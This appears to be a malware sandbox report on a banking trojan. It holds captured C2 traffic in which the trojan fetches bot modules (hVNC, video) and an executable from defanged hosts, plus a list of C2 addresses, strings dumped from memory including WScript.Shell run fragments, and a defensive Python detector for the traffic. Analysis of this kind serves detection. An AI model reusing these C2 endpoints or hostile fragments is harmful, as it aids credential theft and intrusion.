....1\]..=Z&..|..~......E........MPt.#D....,3.*..:5...d.]..Z.........Y
jR.....*\.M.,..#/j.....f=....L7...,C..z..{...s1.X...Q~'.:>..ln..&..
...a...).j..G...............RLk.&..bs.mN...6{.e..r..I~`,..G...*W.. ..7
.k.v....Wr..P....(^.K........-..Lw.....{br...U!5. L'....?.....p..../.}
3...\;..&h6'2..<..E..ZN...o.|.,.....6eb......|1...!.$....<.,.q.C
....-..q..X..T.6....G(.."...Hc..d.........r.;U..7q..,.6c...e$p.[.J..l.
...x..7.D..% ..(..]..rJ-g..V}_.B..m...5q.. ..Q....NX%..v..n._A...G....
(). ~.}:}...*..#..&U........gQbh).d.R".u.G.z)\.."..!H.\.......8. |....
.#.yR.|..Qp....v.k\.BeE...U3..=.g..lR.DL.....3o..i.\?6[..0..f..E.0.i.B
[email protected]..=..#..1...).XN.2._>>5.....B..?/.,.aF.....'.
S...N{....;..Z...1.....%.v.?{[email protected]|..O.i.(.....Lk.-t.7...A........&g
t;r...v....19.-VT./....U|M..Niu.`...?r\.o..j;`..[.n.k@..|..i.~...j$...
.5#(..7..._.U..nl......OH....'.`V.DN5<QyE=....'5e....x......|4..P..
.G...N.GI...e....,...K^/........u,k..sD=.....L.NR.>.....]Q...&.]0..
..k.W.:.k'.Q.i....6,-Qp~!{qkr.:..."....-.........tD...zD!.c....vHM.?.*
..^..J....X.5.<.u........c7...7jo.dm.(BB..0......I...h.....q&q

<<< skipped >>>

GET /webhp HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google.com
Cache-Control: no-cache


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP
Content-Length: 265
Date: Sun, 20 Sep 2015 13:52:43 GMT
Server: GFE/2.0
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH
8KMSAYPvqs9AP">here</A>...</BODY></HTML>....


POST /kent/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

.....HQ..K4.fR......2.44S..kq..@I3.;..u.k.>...c...*.....s..Y#Z.....i&|GC)T>*E.&..ic..'b..d.&...Av...&....g ..MO.zm.[.K..}
..2a.? 4c.T..^.TO
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:14 GMT
Content-Type: application/octet-stream
Content-Length: 174876
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/atmos_video.module"
Content-Transfer-Encoding: binary
.....Qp.d8........'(.e..........4".,.NA...7.H.j...C....4.zR..T8..X...V
.*.....<...0.$.S0...uq.z.kv..>.7.YF(..U.3su.DE,\A....{Q{}.[.]..Q
.C..aW..,r%'N..*....M.Y.....^4..*~...NO..,"d./..s<GRR.Pb..1F....\t.
CX..f.~mjL.:%,....[[email protected]..;2........]........<.
Z..3....\.5e..N...p....!;.d/...gy....=..Q.%3./.b... .<.d.R.{'.".#.L
C-...]....&w.R.unO.).M=.i$.w....&....j%2?.. .c|;6h.eK.k.....G...J...*.
.U.2.r&6-j....TN...2...XI...M.......uC.T.Y... [email protected].
..b)>".%u..-.....e...o.d.mV..(......D..F.p&..{.i.G&..Z....?EV.V:.SB
.W.g...|u.....Y.U..G.>j..g....ClX..........u.....W.......z.f....]K.
4.6#.B...Q&.PQ5......:..... ......Z.6..}.e.o...~.R.._i:...4.. =[}.@o..
.W...!..[.$@....,Y...v...UP...... ...[IZ.(B...3. ..VotAq#....."P...U.-
.#...K.^,x4R-.`q.<,bE....?..g..g.;...KHs.?..... j`.I.q.=V.|...MI...
........^.4V.N.f......IOt..4`.."*[email protected].`. ...iS......G..,....1.X.i....
...p.c....0.,..z.....j.......t..Q.T.8...A........).).#...i..$9...."OV.
Qn.......^.M..V...~B....:...9C.l5 ..Y.|........l.t.&...:u..z..I....'..
.)...l...l;.3 ....`.R.tf."([email protected].../...C.d.y%...>..\...J.ca...
..{......1_..8P$....ob....w.4....`gi..*)E...I...E...n.`.6.....^-.....d
.:I.\..\3....#kx1... 2..T...(KY=v.......y...P2.JFs..H...u1..F.U..o.3.&
.#.D.t$...AP. ....F.PC...#......T./...e.7. ......a.p.g.C\=.i7}5..5...,
.Ew..b..$.D....m.-[....G.3.U........ e!Y?....2*..wc.af....xmH...O.T`..
....k...7..2.%bI..K.....E~..F=....3.....M.xY........<....($..Q..C..
RH.G(t.e...t/Wf,. ..G.o.I.*..HB.F.(..t.[.t.1=..O..../..Lj^.[.,].].

<<< skipped >>>

POST /kent/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

fOg..3<.Z...=.Wv....b.:.$..4..0Y.....k.. .[...|..j...l..=-.;
N......*.x...?3D...J3?......V...b..I......#fF.&*v..............V./....8.`./..%
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:14 GMT
Content-Type: application/octet-stream
Content-Length: 225052
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/atmos_hvnc.module"
Content-Transfer-Encoding: binary
.....Qp.d8........f.U....y...c.l.C.e..|k..1.@.._.CF._:.l.;0U^."}..J..f
...3K._I.........f. h....^0..(..7..k.J<.Q .R..\`.t. .c.../.a6..%.D.
.}b.V{<%.7qX,......A.......!.F>_.O..P...#.DS7.............Z,....
..!...\.cS......[|......p.K.Y...P.V..x.Y..^"P.I?.7oj>...h.x........
.Q ./.......;,NF%Wf.YOQ.*z.l"...........w.....>.d...........rY,.c.(
H..^h... .....}.%Z.....H<...g.:t{2l.Y.r6.....x.....q,kW...thS.....1
....S .5.Cb.b.O.?....s....*d\..#...2u..cDFY$......Bp....*......p#.u...
.6....WU.;F..l.......c>z....D.H.WJ-.2U........>.......D.........
..x9..R......'.5..,..;..... .M........"O.........B....-^#;.A.._*lb.6IP
.'.k.o.......9<.>g......P..T.p.t..,%.......a..#.~.r84.._.....U..
LI.....!.....5..D.....`...A..g.4.0~6.....!...M.I.O....4..]65v......]..
[email protected]........... ...R..7>.....4.C..a.qw)B......./.P.....x....x)w
.x..e........r....4j......`Ms...E.....#..x0..$.ix...N..70Ug...G0.{-.ZF
.R.-....?.......8p.......j.|q.9.{[email protected]]...X.Y/.^.....&$Az\....e....
i.P.%....../.B./.QE.2V0..A.h!....,...L-. [email protected].~..
.N-..h.:#....A.Bh.L..-W..7....r?%.ZHq.G..q.O.t6."G.M?.1.h......Ap?.1T
...B.H...e........A.q.3.W.......`....W..?..6.;.....p.U....$.....G....x
.........4.......=a.-. D.G.PI..........Z..G..!...~#..G..,....enp..?..,
.Z..2&h..h..{.......&K....z..QJ..n.O....._B......f.....E.l./.>N.8.N
..#R'....?HjH......ll.M../n.X..........fF..........P.]:j..}..._..2.x..
.N0.h<.#o.3....9(..w..../.'.U..9..%...K.a....X...VD#......;.6;:..7.
..Y[.......3.c..F(.....Rc..`t.Gb%j.M....V..$S....o..f-...rA..k...^

<<< skipped >>>

POST /kent/exit.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 277
Connection: Keep-Alive
Cache-Control: no-cache

.,.5...n
.aQ..M...n..Y.mR.Nlx..U...7....P..A..........v.....^.i.e6....;[email protected]~...:z}4...."..!.$ic".s)....D[...f.......T%......c.v...9{......v.t.eB....b.Y%...G.dmt...6.8.7.....J..c....f!..R.R' .^p.........".5Y....gg.....`....r...6...~. ......
{[email protected]..
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:44 GMT
Content-Type: text/html
Content-Length: 76
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Vary: Accept-Encoding
.).O/,[email protected]'`8..0....=.9.H.....=f.1..c..# .*[email protected]. ..35.<.
....('..VHTTP/1.1 200 OK..Server: nginx/1.2.1..Date: Sun, 20 Sep 2015
13:52:44 GMT..Content-Type: text/html..Content-Length: 76..Connection:
keep-alive..X-Powered-By: PHP/5.4.27-1~dotdeb.1..Vary: Accept-Encodin
g...).O/,[email protected]'`8..0....=.9.H.....=f.1..c..# .*[email protected]. ..35.&l
t;.....('..V
....



POST /kent/exit.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 277
Connection: Keep-Alive
Cache-Control: no-cache

e..Gp.O..rr..#.D)..v7.\.^l.?..H.d..3fS'...>k.n..R.MD...E....~....R.0..q..p
..k.\$6.......7?z].b~C......./ .n.^;'3.._.A<<.uu...!Xl0A..
0..!N.?..:I
n.p..!V..K.m.x$.)c.l.f..px..(\.....;;sg.R|.....*9...`........
...A..7..0..6.7[.-~Vr.ie`y...>d.P...An...O... .........](t.7.7..}%X
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:45 GMT
Content-Type: text/html
Content-Length: 76
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Vary: Accept-Encoding
.M.z.!.....{.#...Z.."3u..:....S..m.K....U....i.~G......(d...M)w5.Xe...
;..h..HTTP/1.1 200 OK..Server: nginx/1.2.1..Date: Sun, 20 Sep 2015 13:
52:45 GMT..Content-Type: text/html..Content-Length: 76..Connection: ke
ep-alive..X-Powered-By: PHP/5.4.27-1~dotdeb.1..Vary: Accept-Encoding..
.M.z.!.....{.#...Z.."3u..:....S..m.K....U....i.~G......(d...M)w5.Xe...
;..h....


GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: microsoft.com
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.microsoft.com/
Server: Microsoft-IIS/8.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sun, 20 Sep 2015 13:52:49 GMT
Connection: close
Content-Length: 148
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://VVV.microsoft.com/">here</a></body>..


GET /new.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: changeexchange4.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 20 Sep 2015 13:52:44 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 20 Sep 2015 12:45:08 GMT
ETag: "1c795b9-23fa8-5202d22803d00"
Accept-Ranges: bytes
Content-Length: 147368
Connection: close
Content-Type: application/x-msdos-program
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......O...........
............D.......=.......Rich............PE..L...c..U..............
[email protected].......
................................D...(........................?........
..........................................(... .......................
.............text...H........................... ..`.data.............
[email protected]...............................@..@l.[J....
........MSVBVM60.DLL..................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>
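The C2 exchanges above share the traits the ET rules key on: a short POST of non-text bytes to a .php script, answered with an octet-stream "attachment" whose filename names a bot module or webinject file. The triage routine below is an added example rather than anything from the report; it applies those checks, plus an entropy check on the response body, to constructed exchanges that reuse the captured hosts, paths and filenames (hosts kept defanged as VVV.). The body bytes are filler, not the real ciphertext, and the 0.3 and 7.0 thresholds are assumptions to be tuned against benign traffic.

```python
"""Triage HTTP exchanges for the C2 pattern captured above: a small binary
POST to a .php script that is answered with an 'attachment' whose filename
names a bot module or webinject file, plus an encrypted response body.

Added example for this report. The exchanges below are constructed to
mirror the captured headers (host names, paths and filenames are the ones
in the report, still defanged as VVV.); the body bytes are filler, not the
real ciphertext, and the 0.3 / 7.0 thresholds are assumptions."""
import math
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

class Exchange(NamedTuple):
    request: bytes
    response: bytes

DISPOSITION_RE = re.compile(r'filename="?([^";]+)"?')

def split_message(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split an HTTP/1.1 message into start line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers, body

def extended_ascii_ratio(body: bytes) -> float:
    """Share of bytes that are >= 0x80 or control characters (tab/CR/LF excluded)."""
    if not body:
        return 0.0
    odd = sum(1 for b in body if b >= 0x80 or (b < 0x20 and b not in (9, 10, 13)))
    return odd / len(body)

def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is uniform, the way encrypted or compressed data looks."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts if c)

def triage(ex: Exchange) -> Tuple[str, str, Optional[str], List[str]]:
    """Return (host, path, delivered filename, reasons the exchange is suspect)."""
    req_line, req_h, req_body = split_message(ex.request)
    method, path, _ = req_line.split(" ", 2)
    _, rsp_h, rsp_body = split_message(ex.response)
    reasons = []
    if method == "POST" and path.lower().endswith(".php"):
        ratio = extended_ascii_ratio(req_body)
        if ratio > 0.3:                       # the ET rules key on the same trait
            reasons.append(f"binary POST to .php ({ratio:.0%} non-text bytes)")
    fname = None
    m = DISPOSITION_RE.search(rsp_h.get("content-disposition", ""))
    if m:
        fname = m.group(1)
        if fname.endswith(".module") or "/webinjects/" in fname:
            reasons.append(f"bot component delivered: {fname}")
    if "application/octet-stream" in rsp_h.get("content-type", "") \
            and shannon_entropy(rsp_body) > 7.0:
        reasons.append("high-entropy (likely encrypted) response body")
    return req_h.get("host", ""), path, fname, reasons

def http(start: str, headers: Dict[str, str], body: bytes = b"") -> bytes:
    """Assemble a raw HTTP message (helper for the constructed samples)."""
    head = start + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers.items())
    return head.encode("latin-1") + b"\r\n" + body

# --- constructed sample traffic ---
UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
REQ_BODY = bytes(range(0x80, 0x80 + 100)) + b"abcdefghijklmnopqrstuvwxyz123456"  # 132 bytes, 100 >= 0x80
RSP_BODY = bytes((i * 73 + 41) % 256 for i in range(4096))   # every byte value exactly 16 times
SAMPLE_EXCHANGES = [
    Exchange(http("POST /kent/file.php HTTP/1.1", {"Host": "VVV.cpro.moscow", "User-Agent": UA,
                  "Content-Length": str(len(REQ_BODY))}, REQ_BODY),
             http("HTTP/1.1 200 OK", {"Server": "nginx/1.2.1", "Content-Type": "application/octet-stream",
                  "Content-Disposition": 'attachment; filename="./files/atmos_hvnc.module"'}, RSP_BODY)),
    Exchange(http("POST /kent/file.php HTTP/1.1", {"Host": "VVV.cpro.moscow", "User-Agent": UA,
                  "Content-Length": str(len(REQ_BODY))}, REQ_BODY),
             http("HTTP/1.1 200 OK", {"Server": "nginx/1.2.1", "Content-Type": "application/octet-stream",
                  "Content-Disposition": 'attachment; filename="./files/webinjects/merged-1.txt"'},
                  RSP_BODY[:1024])),
    Exchange(http("GET /webhp HTTP/1.1", {"Host": "VVV.google.com", "User-Agent": UA}),
             http("HTTP/1.1 302 Found", {"Content-Type": "text/html; charset=UTF-8",
                  "Location": "hXXp://VVV.google.com.ua/webhp"}, b"<HTML><BODY>302 Moved</BODY></HTML>")),
]

if __name__ == "__main__":
    for host, path, fname, reasons in map(triage, SAMPLE_EXCHANGES):
        print(f"{host}{path} -> {fname or '-'}: {'; '.join(reasons) or 'nothing flagged'}")
```

The Google connectivity check passes through unflagged, which is the point of combining the checks: a binary POST on its own also describes legitimate file uploads, and an octet-stream download on its own describes every software update, but a .php endpoint that takes an opaque POST and hands back an encrypted "module" is the bot's own update channel.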

The Trojan connects to the servers at the following location(s):

www.cpro.moscow (195.242.161.117)
changeexchange4.ru (194.28.133.91)
www.google.com / www.google.com.ua (173.194.113.209)
microsoft.com (134.170.188.221)
download.microsoft.com (23.64.226.15)

Strings from Dumps

regsvr32.exe_3264:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp4
IWebBrowser2l
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;<=
!"#$%&'()*+,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
3,313[3`3
829<9]9~9
=.=3=[=`=
>!>&>7><>
7)707;7@7
= =$=,=_=
?0'101>1
: :&: :}:
?,?;?@?^?
8 8$8(8,808
c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1  pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c 
jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA 
